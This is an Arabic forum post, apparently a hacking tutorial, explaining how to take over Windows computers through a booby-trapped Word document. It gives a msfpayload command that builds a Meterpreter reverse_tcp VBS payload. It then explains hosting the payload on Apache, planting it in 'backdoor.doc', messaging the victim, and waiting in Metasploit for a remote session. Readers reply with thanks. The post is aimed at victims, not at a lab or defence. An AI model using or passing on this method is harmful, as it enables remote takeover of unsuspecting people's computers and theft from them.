هده طريقة لاختراق الحواسيب ع ن طريق ملفات ال Microsoft office

لرؤية الشرح بالصورة و الصوت مباشرة هنا

http://blip.tv/jac0bn3t/office-files...cripts-5370003

للتحميل الشرح هنا

http://blip.tv/file/get/Jac0bn3t-off...Scripts859.mp4



بعد رؤية الشرح المرجو قراءة هدا الموضوع

ما قمت باستخدامه :

samba client

metasploit

OS:backtrack 5 linux and Win SP2 and SP3

Microsoft office word 2003

camtasia video recording and editing

سنقسم الشرح الى خطوتين:

الخطوة الأولى:اعداد الباكدوور و تلغيمه

سوف احتاج الى Win XP helper maching and Microsoft Office للعمل حقن لملف (doc.)

كيف سنقوم بالحقن *:

سنعد Visual basic script عن طريق Metasploite باستعمال ال Command

التالية:

msfpayload windows/meterpreter/reverse_tcp lhost=0.0.0.0
lport=8080 -e shakita_ga_nai V

تم وضعنا ال Visual basic script في ملف VBS.txt في

/var/www/vbs.txt

سوف تتسألون لمادا وضعنها في هدا الملف /var/www

هدا الملف خاص بالوب لتكون مشاطرة Visual basic script

سهلة بين ال backtrack 5 و Win XP helper maching

بحيت قمت ببدأ apache2 server

و أصبح الملف VBS.txt
الذي فيه ال Visual basic script قابل للتحميل من أي حاسوب

بعد تلغيم الملف (.doc) الدي سميته backdoor(لتسهيل الشرح)

كيف تم التلغيم الملف الشرح في ال***1698;يديو من الدقيقة 6:00 إلى 7:16

علما ان ال Port :445 مفتوحة على ال Win XP helper maching قمت بوضع ملف الملغم backdoor.doc

في ملف منقسم مع ال Network أي *.*.192.168

وإ ستعملت ال samba client من اجل الدخول إلى الملف المقاسم تم قمنا بعمل
cp
أي copier coler للملف الملغم الى var/www/backdoor.doc

من اجل مشاطرته مع الضحية

قمنا بإرسال رسالة الى الضحية مع IP الخاصة بال apache2 server

قمنا بعمل listining بال metasploite

لل Port and ip لقمنا باستعمالها لإنشاء ال PAYLOAD

و ننتضر الضحية

بعد ان يقرأ الضحية الرسالة و يحمل الملف الملغم و يفته سوف نحصل على meterpreter session

وهدا كل شيء

الموسيقا المستعملة :infected mushrooml-saaed
and
illuson dj markitos

بارك الله فيك
واصل يابعدي

شكرا على الشرح